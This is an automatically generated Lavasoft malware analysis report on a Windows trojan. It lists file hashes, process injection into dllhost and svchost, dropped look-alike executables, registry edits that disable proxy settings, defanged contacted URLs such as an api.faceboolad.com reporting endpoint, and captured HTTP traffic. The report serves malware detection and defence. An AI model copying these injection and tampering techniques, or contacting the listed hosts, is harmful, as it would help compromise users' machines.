Trojan.GenericKD.3790753_6b0f84e316

by malwarelabrobot on December 3rd, 2016 in Malware Descriptions.

Trojan.Win32.Swisyn.fptd (Kaspersky), Trojan.GenericKD.3790753 (B) (Emsisoft), Trojan.GenericKD.3790753 (AdAware), Trojan.Win32.Swrort.3.FD, GenericPhysicalDrive0.YR (Lavasoft MAS)
Behaviour: Trojan

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

Dynamic Analysis

Static Analysis

Network Activity

Map

Strings from Dumps

Removals

MD5: 6b0f84e316bf9990c964e8c4047a0f28
SHA1: 5f98ceb2bfdc8e843bb96a306b96d71373237891
SHA256: 4a7c168015c1c6c883e8bf94cf187177dbb4680ce9faf73b85d8b2702169dcbc
SSDeep: 98304:UvSx8tfFKAfUntOlxy1Qn/ROhPxW6huquKsCGI:UvSx8dxfUntGxyFhPdhuquKsCh
Size: 4019693 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PolyEnE001byLennartHedlund, MicrosoftVisualC, MicrosoftVisualCv50v60MFC, MicrosoftVisualC50, Armadillov171, UPolyXv05_v6
Company: no certificate found
Created at: 2011-05-24 18:16:01
Analyzed on: Windows7 SP1 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:2948

The Trojan injects its code into the following process(es):

dllhost.exe:2044
svchost.exe:2944

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process dllhost.exe:2044 makes changes in the file system.
The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012016101020161017 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012016102820161029 (0 bytes)

The process %original file name%.exe:2948 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roamin\Mstui\svchost.exe (6076 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roamin\Mstui\dllhost.exe (9645 bytes)

Registry activity

The process dllhost.exe:2044 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\dllhost_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\dllhost_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\dllhost_RASAPI32]
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\dllhost_RASMANCS]
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\dllhost_RASAPI32]
"EnableFileTracing" = "0"

"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3C 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\dllhost_RASMANCS]
"MaxFileSize" = "1048576"
"FileDirectory" = "%windir%\tracing"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process %original file name%.exe:2948 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

Dropped PE files

MD5	File path
8ba905011841289cdfc95f195eaaaba4	c:\Users\"%CurrentUserName%"\AppData\Roamin\Mstui\dllhost.exe
6b16b8b3808adc5fd7182f188803bc44	c:\Users\"%CurrentUserName%"\AppData\Roamin\Mstui\svchost.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
.text	4096	71955	72192	4.55918	3c72b06e02f4afbad83d6aa896575140
.rdata	77824	13612	13824	3.44888	62fb898719481a603059fc42554f80ef
.data	94208	10604	2048	2.55588	4cb364a72e7c9869ec05686d3fe4aabe
.rsrc	106496	69632	69632	0.861377	f485a9daf9ceb63414b8bf978c320b82

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 1
21da04796db2ffc3d949116e2d416367

URLs

URL	IP
hxxp://api.faceboolad.com/api//send
hxxp://api.faceboolad.com/api/report?type=1&code=Windows 7 Ultimate Edition Service Pack 1 x86 (Build:7601) \| Internet Explorer 9.0.8112.16421
hxxp://api.faceboolad.com/api/ip
hxxp://d3vzyycpfbk7qm.cloudfront.net/track_ch.php?ip=194.242.96.218&o=2
hxxp://api.faceboolad.com/
hxxp://lxudv.com/?a=539528&c=1430992&m=32&s1=17	72.3.166.133
hxxp://www180.myway.com/index.jhtml
hxxp://googleadapis.l.google.com/css?family=Maven Pro:700,900\|Roboto:400,700,900
hxxp://a1255.g.akamai.net/images/vicinio/dsp-images/jeremy.jacinto/asset1_3/1471015421274.png
hxxp://a1255.g.akamai.net/images/download/spokesperson/html5/audio/spokesperson.js
hxxp://a1255.g.akamai.net/images/vicinio/dsp-images/michael.lockwood/assetRebuttal_1/1470778641078.png
hxxp://e3432.b.akamaiedge.net/prd/ttdetectUtil.js
hxxp://e3432.b.akamaiedge.net/images/anx/anemone-1.2.7.js
hxxp://a1255.g.akamai.net/images/vicinio/dsp-images/jeremy.jacinto/background/1471015123308.png
hxxp://a1255.g.akamai.net/images/vicinio/dsp-images/jeremy.jacinto/background999/1471015850415.png
hxxp://www180.myway.com/anemone.jhtml?anxuu=355A1458-B606-4CD6-A42E-AB2595CB700B&anxa=CAPDownloadProcess&anxv=1.0.0&anxd=2011-06-01T04:00:00Z&anxsn=dubprdsndlbfe47.dub.jabodo.com&anxu=http://free.mytransitguide.com/index.jhtml&anxl=en-US&anxlv=1480701872700&anxrd=bus.ad-jump.com&anxrk=-&anxrm=referral&anxrb=-&anxrc=-&anxrs=-&anxsq=1&anxi=F3E6638C-ED5D-4BD2-9768-0AC49325CE9F&anxe=backFill&anxr=903713179
hxxp://a1255.g.akamai.net/images/vicinio/dsp-images/jeremy.jacinto/asset1_15/1471016865981.png
hxxp://a1255.g.akamai.net/images/download/myway/pbmw_0215.png
hxxp://a1255.g.akamai.net/images/vicinio/dsp-images/crx-tooltab-swap3/BNH.png
hxxp://e3432.b.akamaiedge.net/prd/ttdetect.html?&op=g&cobrand=BNH&xdm_e=http://free.mytransitguide.com&xdm_c=default7926&xdm_p=1
hxxp://gstaticadssl.l.google.com/s/roboto/v15/2UX7WLTfW3W8TclTUvlFyQ.woff
hxxp://gstaticadssl.l.google.com/s/roboto/v15/mnpfi9pxYH-Go5UiibESIj8E0i7KZn-EPnyo3HZu7kw.woff
hxxp://gstaticadssl.l.google.com/s/roboto/v15/d-6IYplOFocCacKzxwXSOD8E0i7KZn-EPnyo3HZu7kw.woff
hxxp://www180.myway.com/localStorage.jhtml
hxxp://www180.myway.com/anemone.jhtml?anxuu=355A1458-B606-4CD6-A42E-AB2595CB700B&anxa=CAPDownloadProcess&anxv=1.0.0&anxd=2011-06-01T04:00:00Z&anxsn=dubprdsndlbfe47.dub.jabodo.com&anxu=http://free.mytransitguide.com/index.jhtml&anxl=en-US&anxlv=1480701872755&anxsq=3&present=false&anxe=ToolbarDetect&anxr=1137261564
hxxp://www180.myway.com/mirrorCookies.jhtml
hxxp://www180.myway.com/installError.jhtml?errorType=browser&errorCode=blockedCountry
hxxp://www180.myway.com/anemone.jhtml?anxuu=355A1458-B606-4CD6-A42E-AB2595CB700B&anxa=CAPDownloadProcess&anxv=1.0.0&anxd=2011-06-01T04:00:00Z&anxsn=dubprdsndlbfe47.dub.jabodo.com&anxu=http://free.mytransitguide.com/installError.jhtml&anxl=en-US&anxlv=1480701874788&anxrd=free.mytransitguide.com&anxrp=index.jhtml&anxrk=-&anxrm=-&anxrb=-&anxrc=-&anxrs=-&anxsq=2&errorCode=blockedCountry&errorType=browser&anxe=installErrorLanding&anxr=152677283
hxxp://a1255.g.akamai.net/images/vicinio/dsp-images/222010004/background999/1458663898223.png
hxxp://www180.myway.com/favicon.ico
hxxp://my.pcmaps.net/api/ip
hxxp://free.mytransitguide.com/installError.jhtml?errorType=browser&errorCode=blockedCountry	74.113.235.138
hxxp://free.mytransitguide.com/index.jhtml	74.113.235.138
hxxp://free.mytransitguide.com/anemone.jhtml?anxuu=355A1458-B606-4CD6-A42E-AB2595CB700B&anxa=CAPDownloadProcess&anxv=1.0.0&anxd=2011-06-01T04:00:00Z&anxsn=dubprdsndlbfe47.dub.jabodo.com&anxu=http://free.mytransitguide.com/index.jhtml&anxl=en-US&anxlv=1480701872700&anxrd=bus.ad-jump.com&anxrk=-&anxrm=referral&anxrb=-&anxrc=-&anxrs=-&anxsq=1&anxi=F3E6638C-ED5D-4BD2-9768-0AC49325CE9F&anxe=backFill&anxr=903713179	74.113.235.138
hxxp://free.mytransitguide.com/anemone.jhtml?anxuu=355A1458-B606-4CD6-A42E-AB2595CB700B&anxa=CAPDownloadProcess&anxv=1.0.0&anxd=2011-06-01T04:00:00Z&anxsn=dubprdsndlbfe47.dub.jabodo.com&anxu=http://free.mytransitguide.com/index.jhtml&anxl=en-US&anxlv=1480701872755&anxsq=3&present=false&anxe=ToolbarDetect&anxr=1137261564	74.113.235.138
hxxp://free.mytransitguide.com/anemone.jhtml?anxuu=355A1458-B606-4CD6-A42E-AB2595CB700B&anxa=CAPDownloadProcess&anxv=1.0.0&anxd=2011-06-01T04:00:00Z&anxsn=dubprdsndlbfe47.dub.jabodo.com&anxu=http://free.mytransitguide.com/installError.jhtml&anxl=en-US&anxlv=1480701874788&anxrd=free.mytransitguide.com&anxrp=index.jhtml&anxrk=-&anxrm=-&anxrb=-&anxrc=-&anxrs=-&anxsq=2&errorCode=blockedCountry&errorType=browser&anxe=installErrorLanding&anxr=152677283	74.113.235.138
hxxp://ak.imgfarm.com/images/vicinio/dsp-images/michael.lockwood/assetRebuttal_1/1470778641078.png	212.30.134.177
hxxp://mytransitguide.dl.myway.com/mirrorCookies.jhtml	74.113.235.138
hxxp://ak.imgfarm.com/images/vicinio/dsp-images/222010004/background999/1458663898223.png	212.30.134.177
hxxp://fonts.gstatic.com/s/roboto/v15/d-6IYplOFocCacKzxwXSOD8E0i7KZn-EPnyo3HZu7kw.woff	74.125.232.247
hxxp://rep.pe-wok.biz/track_ch.php?ip=194.242.96.218&o=2	52.222.174.124
hxxp://free.mytransitguide.com/favicon.ico	74.113.235.138
hxxp://fonts.googleapis.com/css?family=Maven Pro:700,900\|Roboto:400,700,900	173.194.221.95
hxxp://fonts.gstatic.com/s/roboto/v15/2UX7WLTfW3W8TclTUvlFyQ.woff	74.125.232.247
hxxp://akz.imgfarm.com/images/anx/anemone-1.2.7.js
hxxp://ttdetect.staticimgfarm.com/prd/ttdetect.html?&op=g&cobrand=BNH&xdm_e=http://free.mytransitguide.com&xdm_c=default7926&xdm_p=1
hxxp://fonts.gstatic.com/s/roboto/v15/mnpfi9pxYH-Go5UiibESIj8E0i7KZn-EPnyo3HZu7kw.woff	74.125.232.247
hxxp://ak.imgfarm.com/images/vicinio/dsp-images/jeremy.jacinto/asset1_3/1471015421274.png	212.30.134.177
hxxp://ak.imgfarm.com/images/vicinio/dsp-images/jeremy.jacinto/background/1471015123308.png	212.30.134.177
hxxp://bus.ad-jump.com/
hxxp://ak.imgfarm.com/images/download/spokesperson/html5/audio/spokesperson.js	212.30.134.177
hxxp://my.pcmaps.net/api/report?type=1&code=Windows 7 Ultimate Edition Service Pack 1 x86 (Build:7601) \| Internet Explorer 9.0.8112.16421
hxxp://ttdetect.staticimgfarm.com/prd/ttdetectUtil.js
hxxp://ak.imgfarm.com/images/download/myway/pbmw_0215.png	212.30.134.177

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /s/roboto/v15/d-6IYplOFocCacKzxwXSOD8E0i7KZn-EPnyo3HZu7kw.woff HTTP/1.1

Accept: */*

Referer: hXXp://free.mytransitguide.com/index.jhtml

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Origin: hXXp://free.mytransitguide.com

Accept-Encoding: gzip, deflate

Host: fonts.gstatic.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Type: font/woff

Access-Control-Allow-Origin: *

Timing-Allow-Origin: *

Date: Wed, 23 Nov 2016 11:55:02 GMT

Expires: Thu, 23 Nov 2017 11:55:02 GMT

Last-Modified: Wed, 14 Jan 2015 22:48:06 GMT

X-Content-Type-Options: nosniff

Server: sffe

Content-Length: 18568

X-XSS-Protection: 1; mode=block

Age: 799772

Cache-Control: public, max-age=31536000
wOFF......H.......~.........................GDEF.......@...L.0..GPOS..
.........N....GSUB.......\.....&.ROS/2...,...U...`....cmap...........8
..!Zcvt ...,...B...B.N$.fpgm...p...>....S.W.gasp................gly
f......6...a..`.Mhdmx..Bd...d........head..B....6...6....hhea..C......
..$.&..hmtx..C ...G...v..A.loca..Eh........Q.8.maxp..G(... ... ....nam
e..GH..........,.post..G........ .m.dprep..G..........6~.x......P.....
.........@.C.e....N..4.{.qt...r.q.................#x......].../....W..
.l..m..m..m..=U[...R.....[...wn...I)TI...T.T%}..{.V..i..-..U.Nm.Gn!3b.
.w....}..[6..F_D.%.@.Kb.t.I..=.. NRng...,p.9..=N2'..g....S....qZ..9..&
gt;.@F.3.......7.A........."..W2. ?b..9....T.~...M....U:eT&eS....G.UB.
T^.TQUTM5T[.5IS4U..\ .R..Zk.V..^..Q..C;.K.u@'tR.tZ.tQ.tYWtU.t[..,.s.{.
\..{.SrQ#P.=W.Ln;../..jm.........[..6_n.V.. .....0.%.K*,/..z..XI|.."..
$.Fl.l..A5..$....#2....m...[...|...>.>..J.../...7P).O...Yo.....5
Uc."._..O.=......4......m.w..\B...%.........._|.5.k*..YY..s6;.%..s....
..F..7...-..X:e#...QQ{.bP.JBE....g.{..0..dr..r.W.JX..a...[..0...p...{.
N.)8....\. p..Q.:...p...!)...r.#..W.m.u..X......dg#...H...........S...
.a...........[.."o..#.p...w...p.D....*.......N.`.1.......|.....`..... 
.!...:............................x.]P5..1...lw....N..}*.....Rx..=.2..
,o.q....K.....#._0\...#e......a....)..W4...z8..L..C../...LA.z..{P...y.
.p..X... i....$..J...J.......2=e.Xu.8.1......@....K...X.T.1.qR.8..L)..
..-.....6.1.V`....XL#Q...=c....{...>....<4...,.t.n....3.....3fM.
4.a..)ukDf......F9..b.xE....."..93D.[rL....J.3.8..)rc...s,..@~J...<<< skipped >>>

GET /images/download/myway/pbmw_0215.png HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://free.mytransitguide.com/index.jhtml

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: ak.imgfarm.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: Apache

Last-Modified: Mon, 06 Apr 2015 15:45:14 GMT

ETag: "7c4da-e6e-513102f2028b9"

Accept-Ranges: bytes

Content-Length: 3694

Cache-Control: max-age=315356122

Expires: Thu, 03 Apr 2025 15:45:14 GMT

Content-Type: image/png

Date: Fri, 02 Dec 2016 18:04:34 GMT

Connection: keep-alive
.PNG........IHDR.............7}Y.....tEXtSoftware.Adobe ImageReadyq.e&
lt;...hiTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCe
hiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk=
"Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> &
lt;rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
 <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap
/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#"
 xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xm
p.did:EB1AF690002268118083D7278FA7B643" xmpMM:DocumentID="xmp.did:E2AD
D17ECC8A11E4A054D8767549C4C5" xmpMM:InstanceID="xmp.iid:E2ADD17DCC8A11
E4A054D8767549C4C5" xmp:CreatorTool="Adobe Photoshop CS6 (Macintosh)"&
gt; <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:F01AF6900022681180
83D7278FA7B643" stRef:documentID="xmp.did:EB1AF690002268118083D7278FA7
B643"/> </rdf:Description> </rdf:RDF> </x:xmpmeta>
; <?xpacket end="r"?>.V......IDATx..[.P...>.....cyh..DEyC$J.D
C...R.jL..N.h.t&S...M..v....[.c...D..UyD..b...("..~..7....._..h38...9.
..........s.....w.L.X....z}y.N......{....kn..j.z...Q..{^/......}..|.{.
.o.....}..{'....1..T5..j.j........A.{..;......~....Q-............yO.j.
..-Z{#.m..P.?.\.@.....,A}.u....[Q]...s..<.3.1.g..4......K.e......&g
t;..[zC....T.'''.................. ............=......j...............
[......$..|./77.....1.'B`O~.xmnn.._............7E.......@j..FU7u......
Z..Z..w:.a.^....CC[/......,-..Sm...jX...=....8y.Y.._V..x3.a..U94..<<< skipped >>>

GET /s/roboto/v15/2UX7WLTfW3W8TclTUvlFyQ.woff HTTP/1.1

Accept: */*

Referer: hXXp://free.mytransitguide.com/index.jhtml

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Origin: hXXp://free.mytransitguide.com

Accept-Encoding: gzip, deflate

Host: fonts.gstatic.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Type: font/woff

Access-Control-Allow-Origin: *

Timing-Allow-Origin: *

Date: Thu, 10 Nov 2016 00:36:11 GMT

Expires: Fri, 10 Nov 2017 00:36:11 GMT

Last-Modified: Wed, 14 Jan 2015 22:47:37 GMT

X-Content-Type-Options: nosniff

Server: sffe

Content-Length: 18520

X-XSS-Protection: 1; mode=block

Age: 1963703

Cache-Control: public, max-age=31536000
wOFF......HX................................GDEF.......@...L.0..GPOS..
.............IGSUB.......\.....&.ROS/2.......V...`....cmap...T.......8
..!Zcvt .......L...L$A..fpgm...H...;....g.\.gasp................glyf..
....6r..b&....hdmx..B....d........head..Bh...6...6.F..hhea..B........$
...}hmtx..B....E...v.ZQ.loca..E.........:.!.maxp..F.... ... ....name..
F..........o,.post..G........ .m.dprep..G.........t...x......P........
......@.C.e....N..4.{.qt...r.q.................#x....p#L.......si...m.
:..m..m.6..m....\....v..xVm.....T.....g..".*..............[..f8.....'d
..o.b.....-...x@...K....Gc..k...$..w}.T7.y]....Q....eu.]qw.........2X.
.\R....ujR..3wW...k.IK$......o.......9_....-..'....d!;..G......d....X.
1..Ld....,f3...c1.Y.Z...-D.C,qlg..H{^mv;.6.-B...CN|4....k.Z..|...gR.^.
.?4....AxIO.?..]{)D$J..$..cJ|.V;@................AZe/..r.).....A~...R.
.O;..(.FZ..F..F|......z1......l<um.v...-..-..m...&..S.....R.&..#.].
....)..N.'|.w......}I._....e.....% .Xv.M........7;.....%Y$.........v.w
...2J.G... .d.,.]Ke.,...RV..jY#ke.l.h..X..x.. [e.l..;$..-./m?_.q...,..
..JO(..b..];..2_..BY$.Z..V~.}.....d.v.Ek]....U.V..Y .......E2R....4...
.........]...$...U.Z..ZY'.dQ.E.û%N...)..&=E.../d.,...H..7...d.,.....
-..û%N<a..B....x......;e-.....v.t6....b.....J..}.~?.".}.Q./Dmo;..
....`.?.D..;V...........m.-..~...(.)..u.......,.....G.~....V......`..O
X4X&. ..............v.Vj..s.S..}W....6..).l.<'....:..;.`..Z....v.$.
m...[@...`{......wPjGl...i.a... ....~?X.4C.,..]...v0....'=..;....y<
T..........w~....P.z.....k&.O..~...:...X79w.........7..>..;VC.?<<< skipped >>>

GET /images/vicinio/dsp-images/222010004/background999/1458663898223.png HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://free.mytransitguide.com/installError.jhtml?errorType=browser&errorCode=blockedCountry

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: ak.imgfarm.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: Apache

Last-Modified: Tue, 22 Mar 2016 16:24:59 GMT

ETag: "d60bc-264b0-52ea5a7985c6e"

Accept-Ranges: bytes

Content-Length: 156848

Cache-Control: max-age=293322024

Expires: Fri, 20 Mar 2026 16:24:59 GMT

Content-Type: image/png

Date: Fri, 02 Dec 2016 18:04:35 GMT

Connection: keep-alive
.PNG........IHDR...T.........JL......tEXtSoftware.Adobe ImageReadyq.e&
lt;....iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCe
hiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk=
"Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42        "> &
lt;rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
 <rdf:Description rdf:about="" xmlns:xmpRights="hXXp://ns.adobe.com
/xap/1.0/rights/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:
stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http
://ns.adobe.com/xap/1.0/" xmpRights:Marked="False" xmpMM:OriginalDocum
entID="xmp.did:08801174072068118C14B382F3F4B1D6" xmpMM:DocumentID="xmp
.did:9B41C227E86D11E5AF6AF3244915D9CA" xmpMM:InstanceID="xmp.iid:9B41C
226E86D11E5AF6AF3244915D9CA" xmp:CreatorTool="Adobe Photoshop CC 2015 
(Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:a3a90
085-b1fa-4a83-9998-d427570c3d8e" stRef:documentID="adobe:docid:photosh
op:be0e3ae9-2cdc-1179-a614-eb38104d91c4"/> </rdf:Description>
 </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..$...`u
IDATx...i.-.u..V...=.......D.QL.'J....M.v"..c.2...b;B.#p.(...N....$V..
v.I.,....AB1.....x .. .)...$.M.......:......w...D..w...T..{M....t..w..
.......;.y...D.....r..n....d9.F....g.....D...w....7..).J..y|...u|....;
..>o...................O?.L].xs.|...A.}.n.......r...:e.......L...-.
..3..-..M...}...5......,W.|....`......2..'.3Z..p;.g.Vo].y]..f.s~....2.
..5.....Y.&.....7w.?.=1?..:..a^o@........,z.......>.g6..a......<<< skipped >>>

GET /images/vicinio/dsp-images/michael.lockwood/assetRebuttal_1/1470778641078.png HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://free.mytransitguide.com/index.jhtml

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: ak.imgfarm.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: Apache

Last-Modified: Tue, 09 Aug 2016 21:37:20 GMT

ETag: "85a217-15af-539aa56665f89"

Accept-Ranges: bytes

Content-Length: 5551

Cache-Control: max-age=305436765

Expires: Fri, 07 Aug 2026 21:37:20 GMT

Content-Type: image/png

Date: Fri, 02 Dec 2016 18:04:34 GMT

Connection: keep-alive
.PNG........IHDR...,...........^8...vIDATx...kl.e.._iKO@....P..B.-.r&g
t;...2.3....c...$....;...5a.w2fg>..YW..j\.E.......|XO...v9.C.li;{.z
......P........L`...\.^.}_..D".........................2#.!C&W[..NT..H
. ....e.......I..)Ie..dBH...P.h...Ky]NR......b.....N..-..tM..HMK.r...D
.l.;..%%.!.2.-.#. ..,..]]....%..[w_CR\A......(%&..d.d.dKrLr.!1O...,...
%.Q....k.H...^...j.\..S..X...q.B......P.c..h.'.L.i.}iq.-.c*.h..K?_T.B.
....C)2)6.`2QRj2I...2..5W..q..h..l..p....W..T......t.J."...........&.$
.&... ..Z.z.P.8Uj.I..l..t..R..5"VK. .U...c..%b...!T..5.....d.d.d.!$...
suX-.9Sj.Bjw..r...X.....V...{VA...5p...4.p.!...4.d.."..&KL..,#....R...
&.H..........U,...EZzO Ta....`.&..i%.."........g..j.:.z.5&kM..BB.Z..z.
..R.KE`.R..R..R.%.H.m...eia%...4OV.JV...%..`...._z.._.8p......O{{...}m
mm......K..Mt-Jm6.<xpWss...v.......#.]..U.I M..&.)......]e.:VwV....
....f....|...m..]:.........G....:...5kk..p..={..5mk[j|..i.....a...B.|.
.]..Isd..X.*))i...?|..c.. (.a#.....w.{..;m.{.*......c.e.. U.^.Rp.l....
.....-[..{.......`xaj.y.....Z...i...ji8Z.e..,......i...F.=Uhll.`..o...
._......64.Ib.8.D..wYIa....A...%....N..8{......wv..W.0...={.....y...qA
..!K\..,.ta%...1r_.X...'..|..W|...............#...... ]..v'..e.j7.....
k._#@.......tY......0C........(C..~.d..f,imme.. .hkk{[......"qD.Z...&g
t;V4ae.Q....s....;..W..?tvv......e..q...B...g.V..Se...d..x..).B....Y..
..T..&.#...........U..]..Fu]]]g.....S.g...E..X9j.=ta.{.s...R9..-k.z...
.......'..#r.....k.'..%.Ij......a..........$..t'......<)...#..v.2y.
.\y..:..=.W..w.j....'..B=......V.L.....*........ n..\..NV...a.bia.<<< skipped >>>

GET /css?family=Maven Pro:700,900|Roboto:400,700,900 HTTP/1.1

Accept: text/css

Referer: hXXp://free.mytransitguide.com/index.jhtml

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: fonts.googleapis.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Type: text/css; charset=utf-8

Access-Control-Allow-Origin: *

Timing-Allow-Origin: *

Expires: Fri, 02 Dec 2016 18:04:33 GMT

Date: Fri, 02 Dec 2016 18:04:33 GMT

Cache-Control: private, max-age=86400

Content-Encoding: gzip

Transfer-Encoding: chunked

Server: ESF

X-XSS-Protection: 1; mode=block

X-Frame-Options: SAMEORIGIN
182..............Oo.0......74..c.....Q.S..e..R-.A.u.w.L.........}._.T.
bS.....S..&........6...).g..`].6q-......&....Q..P..@...;...s&s..`.....
.I.#q\....<.Q...X..Y.u.%\ r~...K]8..R@.PX..G.YU....L.f......j/.....
~../M3..d...T._..?.X..K.8....rr...7..k....{...?..dFhb..o.a..........&.
._.. ....U.wec,..2..........U./8......'.9[hO..o.X.`g...Q.V..H.Lm.>.
7DhM}q...|..1....8a}O.......'-.I..B..............a....Xx........0..HTT
P/1.1 200 OK..Content-Type: text/css; charset=utf-8..Access-Control-Al
low-Origin: *..Timing-Allow-Origin: *..Expires: Fri, 02 Dec 2016 18:04
:33 GMT..Date: Fri, 02 Dec 2016 18:04:33 GMT..Cache-Control: private, 
max-age=86400..Content-Encoding: gzip..Transfer-Encoding: chunked..Ser
ver: ESF..X-XSS-Protection: 1; mode=block..X-Frame-Options: SAMEORIGIN
..182..............Oo.0......74..c.....Q.S..e..R-.A.u.w.L.........}._.
T.bS.....S..&........6...).g..`].6q-......&....Q..P..@...;...s&s..`...
...I.#q\....<.Q...X..Y.u.%\ r~...K]8..R@.PX..G.YU....L.f......j/...
..~../M3..d...T._..?.X..K.8....rr...7..k....{...?..dFhb..o.a..........
&.._.. ....U.wec,..2..........U./8......'.9[hO..o.X.`g...Q.V..H.Lm.>
;.7DhM}q...|..1....8a}O.......'-.I..B..............a....Xx........0..<<< skipped >>>

GET /?a=539528&c=1430992&m=32&s1=17 HTTP/1.1

Accept: text/html, application/xhtml xml, */*

Referer: hXXp://bus.ad-jump.com/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: lxudv.com

Connection: Keep-Alive


HTTP/1.1 302 Found

Cache-Control: private

Content-Type: text/html; charset=utf-8

Location: hXXp://free.mytransitguide.com/index.jhtml

Server: Microsoft-IIS/8.0

p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"

